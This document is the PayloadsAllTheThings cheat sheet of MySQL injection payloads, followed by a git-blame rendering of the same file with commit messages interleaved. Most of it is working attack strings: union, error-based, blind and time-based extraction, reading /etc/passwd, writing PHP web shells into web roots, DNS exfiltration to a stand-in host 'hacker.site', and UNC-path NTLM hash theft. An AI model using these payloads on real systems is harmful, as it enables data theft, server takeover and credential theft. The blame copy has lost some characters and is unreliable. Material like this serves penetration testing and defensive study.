PayloadsAllTheThings/SQL Injection/MySQL Injection.md

# MYSQL Injection

## Summary

* [MYSQL Comment](#mysql-comment)
* [Detect columns number](#detect-columns-number)
* [MYSQL Union Based](#mysql-union-based)
    * [Extract database with information_schema](#extract-database-with-information-schema)
    * [Extract data without information_schema](#extract-data-without-information-schema)
    * [Extract data without columns name](#extract-data-without-columns-name)
* [MYSQL Error Based](#mysql-error-based)
    * [MYSQL Error Based - Basic](#mysql-error-based---basic)
    * [MYSQL Error Based - UpdateXML function](#mysql-error-based---updatexml-function)
    * [MYSQL Error Based - Extractvalue function](#mysql-error-based---extractvalue-function)
* [MYSQL Blind](#mysql-blind)
    * [MYSQL Blind with substring equivalent](#mysql-blind-with-substring-equivalent)
    * [MYSQL Blind using a conditional statement](#mysql-blind-using-a-conditional-statement)
    * [MYSQL Blind with MAKE_SET](#mysql-blind-with-make-set)
    * [MYSQL Blind with LIKE](#mysql-blind-with-like)
* [MYSQL Time Based](#mysql-time-based)
* [MYSQL DIOS - Dump in One Shot](#mysql-dios---dump-in-one-shot)
* [MYSQL Read content of a file](#mysql-read-content-of-a-file)
* [MYSQL Write a shell](#mysql-write-a-shell)
* [MYSQL Truncation](#mysql-truncation)
* [MYSQL Out of band](#mysql-out-of-band)
    * [DNS exfiltration](#dns-exfiltration)
    * [UNC Path - NTLM hash stealing](#unc-path---ntlm-hash-stealing)
* [References](#references)


## MYSQL comment

```sql
# MYSQL Comment
/* MYSQL Comment */
/*! MYSQL Special SQL */
/*!32302 10*/ Comment for MYSQL version 3.23.02
```


## MYSQL Union Based

### Extract database with information_schema

First you need to know the number of columns, you can use `order by`.

```sql
order by 1
order by 2
order by 3
...
order by XXX
```

Then the following codes will extract the databases'name, tables'name, columns'name.

```sql
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,schema_name,0x7c)+fRoM+information_schema.schemata
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,table_name,0x7C)+fRoM+information_schema.tables+wHeRe+table_schema=...
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,column_name,0x7C)+fRoM+information_schema.columns+wHeRe+table_name=...
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,data,0x7C)+fRoM+...
```

### Extract columns name without information_schema

Method for `MySQL >= 4.1`.

First extract the column number with 
```sql
?id=(1)and(SELECT * from db.users)=(1)
-- Operand should contain 4 column(s)
```

Then extract the column name.
```sql
?id=1 and (1,2,3,4) = (SELECT * from db.users UNION SELECT 1,2,3,4 LIMIT 1)
--Column 'id' cannot be null
```

Method for `MySQL 5`

```sql
-1 UNION SELECT * FROM (SELECT * FROM users JOIN users b)a
--#1060 - Duplicate column name 'id'

-1 UNION SELECT * FROM (SELECT * FROM users JOIN users b USING(id))a
-- #1060 - Duplicate column name 'name'

-1 UNION SELECT * FROM (SELECT * FROM users JOIN users b USING(id,name))a
...
```

### Extract data without columns name 

Extracting data from the 4th column without knowing its name.

```sql
select `4` from (select 1,2,3,4,5,6 union select * from users)dbname;
```

Injection example inside the query `select author_id,title from posts where author_id=[INJECT_HERE]`

```sql
MariaDB [dummydb]> select author_id,title from posts where author_id=-1 union select 1,(select concat(`3`,0x3a,`4`) from (select 1,2,3,4,5,6 union select * from users)a limit 1,1);
+-----------+-----------------------------------------------------------------+
| author_id | title                                                           |
+-----------+-----------------------------------------------------------------+
|         1 | a45d4e080fc185dfa223aea3d0c371b6cc180a37:veronica80@example.org |
+-----------+-----------------------------------------------------------------+
```


## MYSQL Error Based

### MYSQL Error Based - Basic

Works with `MySQL >= 4.1`

```sql
(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
```

### MYSQL Error Based - UpdateXML function

```sql
AND updatexml(rand(),concat(CHAR(126),version(),CHAR(126)),null)-
AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),schema_name,CHAR(126)) FROM information_schema.schemata LIMIT data_offset,1)),null)--
AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),TABLE_NAME,CHAR(126)) FROM information_schema.TABLES WHERE table_schema=data_column LIMIT data_offset,1)),null)--
AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),column_name,CHAR(126)) FROM information_schema.columns WHERE TABLE_NAME=data_table LIMIT data_offset,1)),null)--
AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)) FROM data_table.data_column LIMIT data_offset,1)),null)--
```

Shorter to read:

```sql
' and updatexml(null,concat(0x0a,version()),null)-- -
' and updatexml(null,concat(0x0a,(select table_name from information_schema.tables where table_schema=database() LIMIT 0,1)),null)-- -
```

### MYSQL Error Based - Extractvalue function

Works with `MySQL >= 5.1`

```sql
AND extractvalue(rand(),concat(CHAR(126),version(),CHAR(126)))--
AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),schema_name,CHAR(126)) FROM information_schema.schemata LIMIT data_offset,1)))--
AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),TABLE_NAME,CHAR(126)) FROM information_schema.TABLES WHERE table_schema=data_column LIMIT data_offset,1)))--
AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),column_name,CHAR(126)) FROM information_schema.columns WHERE TABLE_NAME=data_table LIMIT data_offset,1)))--
AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)) FROM data_table.data_column LIMIT data_offset,1)))--
```

## MYSQL Blind

### MYSQL Blind with substring equivalent

```sql
?id=1 and substring(version(),1,1)=5
?id=1 and right(left(version(),1),1)=5
?id=1 and left(version(),1)=4
?id=1 and ascii(lower(substr(Version(),1,1)))=51
?id=1 and (select mid(version(),1,1)=4)
```

### MYSQL Blind using a conditional statement

TRUE: `if @@version starts with a 5`:

```sql
2100935' OR IF(MID(@@version,1,1)='5',sleep(1),1)='2
Response:
HTTP/1.1 500 Internal Server Error
```

False: `if @@version starts with a 4`:

```sql
2100935' OR IF(MID(@@version,1,1)='4',sleep(1),1)='2
Response:
HTTP/1.1 200 OK
```

### MYSQL Blind with MAKE_SET

```sql
AND MAKE_SET(YOLO<(SELECT(length(version()))),1)
AND MAKE_SET(YOLO<ascii(substring(version(),POS,1)),1)
AND MAKE_SET(YOLO<(SELECT(length(concat(login,password)))),1)
AND MAKE_SET(YOLO<ascii(substring(concat(login,password),POS,1)),1)
```

### MYSQL Blind with LIKE

['_'](https://www.w3resource.com/sql/wildcards-like-operator/wildcards-underscore.php) acts like the regex character '.', use it to speed up your blind testing

```sql
SELECT cust_code FROM customer WHERE cust_name LIKE 'k__l';
```

## MYSQL Time Based

```sql
+BENCHMARK(40000000,SHA1(1337))+
'%2Bbenchmark(3200,SHA1(1))%2B'
' OR IF(MID(@@version,1,1)='5',sleep(1),1)='2

AND [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))  //SHA1
RLIKE SLEEP([SLEEPTIME])
OR ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))

?id=1 and IF(ASCII(SUBSTRING((SELECT USER()),1,1)))>=100,1, BENCHMARK(2000000,MD5(NOW()))) --
?id=1 and IF(ASCII(SUBSTRING((SELECT USER()), 1, 1)))>=100, 1, SLEEP(3)) --
```

## MYSQL DIOS - Dump in One Shot

```sql
(select (@) from (select(@:=0x00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0D,0x0A,' [ ',table_schema,' ] > ',table_name,' > ',column_name,0x7C))))a)#
(select (@) from (select(@:=0x00),(select (@) from (db_data.table_data) where (@)in (@:=concat(@,0x0D,0x0A,0x7C,' [ ',column_data1,' ] > ',column_data2,' > ',0x7C))))a)#
```

## MYSQL Read content of a file

Need the `filepriv`, otherwise you will get the error : `ERROR 1290 (HY000): The MySQL server is running with the --secure-file-priv option so it cannot execute this statement`

```sql
' UNION ALL SELECT LOAD_FILE('/etc/passwd') --
```

If you are `root` on the database, you can re-enable the `LOAD_FILE` using the following query

```sql
GRANT FILE ON *.* TO 'root'@'localhost'; FLUSH PRIVILEGES;#
```

## MYSQL Write a shell

```sql
SELECT "<?php system($_GET['cmd']); ?>" into outfile "C:\\xampp\\htdocs\\backdoor.php"
SELECT '' INTO OUTFILE '/var/www/html/x.php' FIELDS TERMINATED BY '<?php phpinfo();?>
-1 UNION SELECT 0xPHP_PAYLOAD_IN_HEX, NULL, NULL INTO DUMPILE 'C:/Program Files/EasyPHP-12.1/www/shell.php'
[...] UNION SELECT 1,2,3,4,5,0x3c3f70687020706870696e666f28293b203f3e into outfile 'C:\\wamp\\www\\pwnd.php'-- -
[...] union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6 into OUTFILE 'c:/inetpub/wwwroot/backdoor.php'
```

## MYSQL Truncation

In MYSQL "`admin `" and "`admin`" are the same. If the username column in the database has a character-limit the rest of the characters are truncated. So if the database has a column-limit of 20 characters and we input a string with 21 characters the last 1 character will be removed.

## MYSQL Out of band

```powershell
select @@version into outfile '\\\\192.168.0.100\\temp\\out.txt';
select @@version into dumpfile '\\\\192.168.0.100\\temp\\out.txt
```

### DNS exfiltration

```sql
select load_file(concat('\\\\',version(),'.hacker.site\\a.txt'));
select load_file(concat(0x5c5c5c5c,version(),0x2e6861636b65722e736974655c5c612e747874))
```

### UNC Path - NTLM hash stealing

```sql
select load_file('\\\\error\\abc');
select load_file(0x5c5c5c5c6572726f725c5c616263);
select 'osanda' into dumpfile '\\\\error\\abc';
select 'osanda' into outfile '\\\\error\\abc';
load data infile '\\\\error\\abc' into table database.table_name;
```

## References

- [MySQL Out of Band Hacking - @OsandaMalith](https://www.exploit-db.com/docs/english/41273-mysql-out-of-band-hacking.pdf)
- [[Sqli] Extracting data without knowing columns names - Ahmed Sultan @0x4148](https://blog.redforce.io/sqli-extracting-data-without-knowing-columns-names/)
- [Help по MySql инъекциям - rdot.org](https://rdot.org/forum/showpost.php?p=114&postcount=1)
- [SQL Truncation Attack - Warlock](https://resources.infosecinstitute.com/sql-truncation-attack/)
- [HackerOne @ajxchapman 50m-ctf writeup - Alex Chapman @ajxchapman](https://hackerone.com/reports/508123)
- [SQL Wiki - netspi](https://sqlwiki.netspi.com/injectionTypes/errorBased)
SQL injections payloads separated + OAuth 2016-11-29 16:27:35 +00:00			`# MYSQL Injection`

MYSQL Truncation attack + Windows search where 2019-04-14 17:46:34 +00:00			`## Summary`

			`* [MYSQL Comment](#mysql-comment)`
			`* [Detect columns number](#detect-columns-number)`
			`* [MYSQL Union Based](#mysql-union-based)`
			`* [Extract database with information_schema](#extract-database-with-information-schema)`
			`* [Extract data without information_schema](#extract-data-without-information-schema)`
			`* [Extract data without columns name](#extract-data-without-columns-name)`
GoGitDumper + MySQL summary rewrite 2019-04-14 22:49:56 +00:00			`* [MYSQL Error Based](#mysql-error-based)`
			`* [MYSQL Error Based - Basic](#mysql-error-based---basic)`
			`* [MYSQL Error Based - UpdateXML function](#mysql-error-based---updatexml-function)`
			`* [MYSQL Error Based - Extractvalue function](#mysql-error-based---extractvalue-function)`
			`* [MYSQL Blind](#mysql-blind)`
			`* [MYSQL Blind with substring equivalent](#mysql-blind-with-substring-equivalent)`
			`* [MYSQL Blind using a conditional statement](#mysql-blind-using-a-conditional-statement)`
			`* [MYSQL Blind with MAKE_SET](#mysql-blind-with-make-set)`
			`* [MYSQL Blind with LIKE](#mysql-blind-with-like)`
MYSQL Truncation attack + Windows search where 2019-04-14 17:46:34 +00:00			`* [MYSQL Time Based](#mysql-time-based)`
			`* [MYSQL DIOS - Dump in One Shot](#mysql-dios---dump-in-one-shot)`
			`* [MYSQL Read content of a file](#mysql-read-content-of-a-file)`
			`* [MYSQL Write a shell](#mysql-write-a-shell)`
			`* [MYSQL Truncation](#mysql-truncation)`
			`* [MYSQL Out of band](#mysql-out-of-band)`
			`* [DNS exfiltration](#dns-exfiltration)`
			`* [UNC Path - NTLM hash stealing](#unc-path---ntlm-hash-stealing)`
			`* [References](#references)`


			`## MYSQL comment`
Markdown formatting update 2018-08-12 21:30:22 +00:00
SQL Cheatsheets - Refactoring part 1 2018-05-16 21:33:14 +00:00			```sql
			`# MYSQL Comment`
			`/* MYSQL Comment */`
			`/! MYSQL Special SQL /`
AWS Pacu and sections + Kerberoasting details 2018-12-25 18:38:37 +00:00			`/!32302 10/ Comment for MYSQL version 3.23.02`
SQL Cheatsheets - Refactoring part 1 2018-05-16 21:33:14 +00:00			```

Markdown formatting update 2018-08-12 21:30:22 +00:00
MYSQL Truncation attack + Windows search where 2019-04-14 17:46:34 +00:00			`## MYSQL Union Based`

			`### Extract database with information_schema`

			First you need to know the number of columns, you can use `order by`.
Markdown formatting update 2018-08-12 21:30:22 +00:00
SQL Cheatsheets - Refactoring part 1 2018-05-16 21:33:14 +00:00			```sql
Symbolic Link Zip + SQL injection ORDER BY 2017-07-04 21:17:59 +00:00			`order by 1`
			`order by 2`
			`order by 3`
			`...`
			`order by XXX`
			```

MYSQL Truncation attack + Windows search where 2019-04-14 17:46:34 +00:00			`Then the following codes will extract the databases'name, tables'name, columns'name.`
Markdown formatting update 2018-08-12 21:30:22 +00:00
SQL Cheatsheets - Refactoring part 1 2018-05-16 21:33:14 +00:00			```sql
SQL injections payloads separated + OAuth 2016-11-29 16:27:35 +00:00			`UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,schema_name,0x7c)+fRoM+information_schema.schemata`
			`UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,table_name,0x7C)+fRoM+information_schema.tables+wHeRe+table_schema=...`
			`UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,column_name,0x7C)+fRoM+information_schema.columns+wHeRe+table_name=...`
			`UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,data,0x7C)+fRoM+...`
			```

SQL injection - MySQL version for error based 2019-02-17 21:56:09 +00:00			`### Extract columns name without information_schema`

			Method for `MySQL >= 4.1`.

			`First extract the column number with`
			```sql
			`?id=(1)and(SELECT * from db.users)=(1)`
			`-- Operand should contain 4 column(s)`
			```

			`Then extract the column name.`
			```sql
			`?id=1 and (1,2,3,4) = (SELECT * from db.users UNION SELECT 1,2,3,4 LIMIT 1)`
			`--Column 'id' cannot be null`
			```

			Method for `MySQL 5`

			```sql
			`-1 UNION SELECT * FROM (SELECT * FROM users JOIN users b)a`
			`--#1060 - Duplicate column name 'id'`

			`-1 UNION SELECT * FROM (SELECT * FROM users JOIN users b USING(id))a`
			`-- #1060 - Duplicate column name 'name'`

			`-1 UNION SELECT * FROM (SELECT * FROM users JOIN users b USING(id,name))a`
			`...`
			```

MYSQL Truncation attack + Windows search where 2019-04-14 17:46:34 +00:00			`### Extract data without columns name`
MYSQL - Extract data without columns name 2019-02-17 20:51:21 +00:00
			`Extracting data from the 4th column without knowing its name.`

			```sql
			select `4` from (select 1,2,3,4,5,6 union select * from users)dbname;
			```

			Injection example inside the query `select author_id,title from posts where author_id=[INJECT_HERE]`

SQL injection - MySQL version for error based 2019-02-17 21:56:09 +00:00			```sql
MYSQL - Extract data without columns name 2019-02-17 20:51:21 +00:00			MariaDB [dummydb]> select author_id,title from posts where author_id=-1 union select 1,(select concat(`3`,0x3a,`4`) from (select 1,2,3,4,5,6 union select * from users)a limit 1,1);
			`+-----------+-----------------------------------------------------------------+`
			`\| author_id \| title \|`
			`+-----------+-----------------------------------------------------------------+`
			`\| 1 \| a45d4e080fc185dfa223aea3d0c371b6cc180a37:veronica80@example.org \|`
			`+-----------+-----------------------------------------------------------------+`
			```


GoGitDumper + MySQL summary rewrite 2019-04-14 22:49:56 +00:00


			`## MYSQL Error Based`

			`### MYSQL Error Based - Basic`
Markdown formatting update 2018-08-12 21:30:22 +00:00
SQL injection - MySQL version for error based 2019-02-17 21:56:09 +00:00			Works with `MySQL >= 4.1`

SQL Cheatsheets - Refactoring part 1 2018-05-16 21:33:14 +00:00			```sql
SQL injections payloads separated + OAuth 2016-11-29 16:27:35 +00:00			`(select 1 and row(1,1)>(select count(),concat(CONCAT(@@VERSION),0x3a,floor(rand()2))x from (select 1 union select 2)a group by x limit 1))`
			`'+(select 1 and row(1,1)>(select count(),concat(CONCAT(@@VERSION),0x3a,floor(rand()2))x from (select 1 union select 2)a group by x limit 1))+'`
			```

GoGitDumper + MySQL summary rewrite 2019-04-14 22:49:56 +00:00			`### MYSQL Error Based - UpdateXML function`
Markdown formatting update 2018-08-12 21:30:22 +00:00
SQL Cheatsheets - Refactoring part 1 2018-05-16 21:33:14 +00:00			```sql
SQL injections payloads separated + OAuth 2016-11-29 16:27:35 +00:00			`AND updatexml(rand(),concat(CHAR(126),version(),CHAR(126)),null)-`
			`AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),schema_name,CHAR(126)) FROM information_schema.schemata LIMIT data_offset,1)),null)--`
			`AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),TABLE_NAME,CHAR(126)) FROM information_schema.TABLES WHERE table_schema=data_column LIMIT data_offset,1)),null)--`
			`AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),column_name,CHAR(126)) FROM information_schema.columns WHERE TABLE_NAME=data_table LIMIT data_offset,1)),null)--`
			`AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)) FROM data_table.data_column LIMIT data_offset,1)),null)--`
			```

Traversal Dir + NoSQL major updates + small addons 2018-02-15 22:27:42 +00:00			`Shorter to read:`
Markdown formatting update 2018-08-12 21:30:22 +00:00
SQL Cheatsheets - Refactoring part 1 2018-05-16 21:33:14 +00:00			```sql
Traversal Dir + NoSQL major updates + small addons 2018-02-15 22:27:42 +00:00			`' and updatexml(null,concat(0x0a,version()),null)-- -`
			`' and updatexml(null,concat(0x0a,(select table_name from information_schema.tables where table_schema=database() LIMIT 0,1)),null)-- -`
			```

GoGitDumper + MySQL summary rewrite 2019-04-14 22:49:56 +00:00			`### MYSQL Error Based - Extractvalue function`
Markdown formatting update 2018-08-12 21:30:22 +00:00
SQL injection - MySQL version for error based 2019-02-17 21:56:09 +00:00			Works with `MySQL >= 5.1`

SQL Cheatsheets - Refactoring part 1 2018-05-16 21:33:14 +00:00			```sql
SQL injections payloads separated + OAuth 2016-11-29 16:27:35 +00:00			`AND extractvalue(rand(),concat(CHAR(126),version(),CHAR(126)))--`
			`AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),schema_name,CHAR(126)) FROM information_schema.schemata LIMIT data_offset,1)))--`
			`AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),TABLE_NAME,CHAR(126)) FROM information_schema.TABLES WHERE table_schema=data_column LIMIT data_offset,1)))--`
			`AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),column_name,CHAR(126)) FROM information_schema.columns WHERE TABLE_NAME=data_table LIMIT data_offset,1)))--`
			`AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)) FROM data_table.data_column LIMIT data_offset,1)))--`
			```

GoGitDumper + MySQL summary rewrite 2019-04-14 22:49:56 +00:00			`## MYSQL Blind`

			`### MYSQL Blind with substring equivalent`
SQL injection - MySQL version for error based 2019-02-17 21:56:09 +00:00
			```sql
			`?id=1 and substring(version(),1,1)=5`
			`?id=1 and right(left(version(),1),1)=5`
			`?id=1 and left(version(),1)=4`
			`?id=1 and ascii(lower(substr(Version(),1,1)))=51`
			`?id=1 and (select mid(version(),1,1)=4)`
			```

GoGitDumper + MySQL summary rewrite 2019-04-14 22:49:56 +00:00			`### MYSQL Blind using a conditional statement`
Markdown formatting update 2018-08-12 21:30:22 +00:00
AD Attack - Golden Ticket + SQL/OpenRed/SSRF 2018-04-12 21:23:41 +00:00			TRUE: `if @@version starts with a 5`:
Markdown formatting update 2018-08-12 21:30:22 +00:00
SQL Cheatsheets - Refactoring part 1 2018-05-16 21:33:14 +00:00			```sql
AD Attack - Golden Ticket + SQL/OpenRed/SSRF 2018-04-12 21:23:41 +00:00			`2100935' OR IF(MID(@@version,1,1)='5',sleep(1),1)='2`
			`Response:`
			`HTTP/1.1 500 Internal Server Error`
			```

			False: `if @@version starts with a 4`:
Markdown formatting update 2018-08-12 21:30:22 +00:00
SQL Cheatsheets - Refactoring part 1 2018-05-16 21:33:14 +00:00			```sql
AD Attack - Golden Ticket + SQL/OpenRed/SSRF 2018-04-12 21:23:41 +00:00			`2100935' OR IF(MID(@@version,1,1)='4',sleep(1),1)='2`
			`Response:`
			`HTTP/1.1 200 OK`
			```

GoGitDumper + MySQL summary rewrite 2019-04-14 22:49:56 +00:00			`### MYSQL Blind with MAKE_SET`
Markdown formatting update 2018-08-12 21:30:22 +00:00
SQL Cheatsheets - Refactoring part 1 2018-05-16 21:33:14 +00:00			```sql
SQL injections payloads separated + OAuth 2016-11-29 16:27:35 +00:00			`AND MAKE_SET(YOLO<(SELECT(length(version()))),1)`
			`AND MAKE_SET(YOLO<ascii(substring(version(),POS,1)),1)`
			`AND MAKE_SET(YOLO<(SELECT(length(concat(login,password)))),1)`
			`AND MAKE_SET(YOLO<ascii(substring(concat(login,password),POS,1)),1)`
			```

GoGitDumper + MySQL summary rewrite 2019-04-14 22:49:56 +00:00			`### MYSQL Blind with LIKE`
SQL wildcard '_' + CSV injection reverse shell 2018-12-26 00:02:17 +00:00
			`['_'](https://www.w3resource.com/sql/wildcards-like-operator/wildcards-underscore.php) acts like the regex character '.', use it to speed up your blind testing`

			```sql
			`SELECT cust_code FROM customer WHERE cust_name LIKE 'k__l';`
			```

MySQL - Code exec 2017-11-09 08:05:50 +00:00			`## MYSQL Time Based`
Markdown formatting update 2018-08-12 21:30:22 +00:00
SQL Cheatsheets - Refactoring part 1 2018-05-16 21:33:14 +00:00			```sql
SQL injections payloads separated + OAuth 2016-11-29 16:27:35 +00:00			`+BENCHMARK(40000000,SHA1(1337))+`
			`'%2Bbenchmark(3200,SHA1(1))%2B'`
Multiple update - LFI/RCE via phpinfo, Struts2 v2 2017-09-13 21:55:29 +00:00			`' OR IF(MID(@@version,1,1)='5',sleep(1),1)='2`
SQL Cheatsheets - Refactoring part 1 2018-05-16 21:33:14 +00:00
			`AND [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')) //SHA1`
Markdown formatting update 2018-08-12 21:30:22 +00:00			`RLIKE SLEEP([SLEEPTIME])`
			`OR ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))`
SQL injections payloads separated + OAuth 2016-11-29 16:27:35 +00:00
SQL injection - MySQL version for error based 2019-02-17 21:56:09 +00:00			`?id=1 and IF(ASCII(SUBSTRING((SELECT USER()),1,1)))>=100,1, BENCHMARK(2000000,MD5(NOW()))) --`
			`?id=1 and IF(ASCII(SUBSTRING((SELECT USER()), 1, 1)))>=100, 1, SLEEP(3)) --`
SQL injections payloads separated + OAuth 2016-11-29 16:27:35 +00:00			```

AWS Pacu and sections + Kerberoasting details 2018-12-25 18:38:37 +00:00			`## MYSQL DIOS - Dump in One Shot`
Markdown formatting update 2018-08-12 21:30:22 +00:00
SQL Cheatsheets - Refactoring part 1 2018-05-16 21:33:14 +00:00			```sql
SQL injections payloads separated + OAuth 2016-11-29 16:27:35 +00:00			`(select (@) from (select(@:=0x00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0D,0x0A,' [ ',table_schema,' ] > ',table_name,' > ',column_name,0x7C))))a)#`
			`(select (@) from (select(@:=0x00),(select (@) from (db_data.table_data) where (@)in (@:=concat(@,0x0D,0x0A,0x7C,' [ ',column_data1,' ] > ',column_data2,' > ',0x7C))))a)#`
Update ReadMe Practice and Book + SQLi 2017-02-07 08:53:48 +00:00			```

SQL injection - MySQL version for error based 2019-02-17 21:56:09 +00:00			`## MYSQL Read content of a file`

			Need the `filepriv`, otherwise you will get the error : `ERROR 1290 (HY000): The MySQL server is running with the --secure-file-priv option so it cannot execute this statement`

			```sql
			`' UNION ALL SELECT LOAD_FILE('/etc/passwd') --`
			```

GoGitDumper + MySQL summary rewrite 2019-04-14 22:49:56 +00:00			If you are `root` on the database, you can re-enable the `LOAD_FILE` using the following query

			```sql
			`GRANT FILE ON . TO 'root'@'localhost'; FLUSH PRIVILEGES;#`
			```

MYSQL Truncation attack + Windows search where 2019-04-14 17:46:34 +00:00			`## MYSQL Write a shell`
Markdown formatting update 2018-08-12 21:30:22 +00:00
SQL Cheatsheets - Refactoring part 1 2018-05-16 21:33:14 +00:00			```sql
Update ReadMe Practice and Book + SQLi 2017-02-07 08:53:48 +00:00			`SELECT "<?php system($_GET['cmd']); ?>" into outfile "C:\\xampp\\htdocs\\backdoor.php"`
Multiple update - LFI/RCE via phpinfo, Struts2 v2 2017-09-13 21:55:29 +00:00			`SELECT '' INTO OUTFILE '/var/www/html/x.php' FIELDS TERMINATED BY '<?php phpinfo();?>`
MySQL - Code exec 2017-11-09 08:05:50 +00:00			`-1 UNION SELECT 0xPHP_PAYLOAD_IN_HEX, NULL, NULL INTO DUMPILE 'C:/Program Files/EasyPHP-12.1/www/shell.php'`
SQLmap TOR + Cookie + Proxy 2018-10-01 14:03:07 +00:00			`[...] UNION SELECT 1,2,3,4,5,0x3c3f70687020706870696e666f28293b203f3e into outfile 'C:\\wamp\\www\\pwnd.php'-- -`
SQLmap --crawl, --form 2018-10-04 17:59:11 +00:00			`[...] union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6 into OUTFILE 'c:/inetpub/wwwroot/backdoor.php'`
Symbolic Link Zip + SQL injection ORDER BY 2017-07-04 21:17:59 +00:00			```
Adding references sectio 2018-12-24 14:02:50 +00:00
MYSQL Truncation attack + Windows search where 2019-04-14 17:46:34 +00:00			`## MYSQL Truncation`

			In MYSQL "`admin `" and "`admin`" are the same. If the username column in the database has a character-limit the rest of the characters are truncated. So if the database has a column-limit of 20 characters and we input a string with 21 characters the last 1 character will be removed.

AWS Pacu and sections + Kerberoasting details 2018-12-25 18:38:37 +00:00			`## MYSQL Out of band`

			```powershell
			`select @@version into outfile '\\\\192.168.0.100\\temp\\out.txt';`
			`select @@version into dumpfile '\\\\192.168.0.100\\temp\\out.txt`
			```

MYSQL Truncation attack + Windows search where 2019-04-14 17:46:34 +00:00			`### DNS exfiltration`
AWS Pacu and sections + Kerberoasting details 2018-12-25 18:38:37 +00:00
			```sql
			`select load_file(concat('\\\\',version(),'.hacker.site\\a.txt'));`
			`select load_file(concat(0x5c5c5c5c,version(),0x2e6861636b65722e736974655c5c612e747874))`
			```

MYSQL Truncation attack + Windows search where 2019-04-14 17:46:34 +00:00			`### UNC Path - NTLM hash stealing`
AWS Pacu and sections + Kerberoasting details 2018-12-25 18:38:37 +00:00
			```sql
			`select load_file('\\\\error\\abc');`
			`select load_file(0x5c5c5c5c6572726f725c5c616263);`
			`select 'osanda' into dumpfile '\\\\error\\abc';`
			`select 'osanda' into outfile '\\\\error\\abc';`
			`load data infile '\\\\error\\abc' into table database.table_name;`
			```

			`## References`

MYSQL - Extract data without columns name 2019-02-17 20:51:21 +00:00			`- [MySQL Out of Band Hacking - @OsandaMalith](https://www.exploit-db.com/docs/english/41273-mysql-out-of-band-hacking.pdf)`
SQL injection - MySQL version for error based 2019-02-17 21:56:09 +00:00			`- [[Sqli] Extracting data without knowing columns names - Ahmed Sultan @0x4148](https://blog.redforce.io/sqli-extracting-data-without-knowing-columns-names/)`
MYSQL Truncation attack + Windows search where 2019-04-14 17:46:34 +00:00			`- [Help по MySql инъекциям - rdot.org](https://rdot.org/forum/showpost.php?p=114&postcount=1)`
GoGitDumper + MySQL summary rewrite 2019-04-14 22:49:56 +00:00			`- [SQL Truncation Attack - Warlock](https://resources.infosecinstitute.com/sql-truncation-attack/)`
			`- [HackerOne @ajxchapman 50m-ctf writeup - Alex Chapman @ajxchapman](https://hackerone.com/reports/508123)`
			`- [SQL Wiki - netspi](https://sqlwiki.netspi.com/injectionTypes/errorBased)`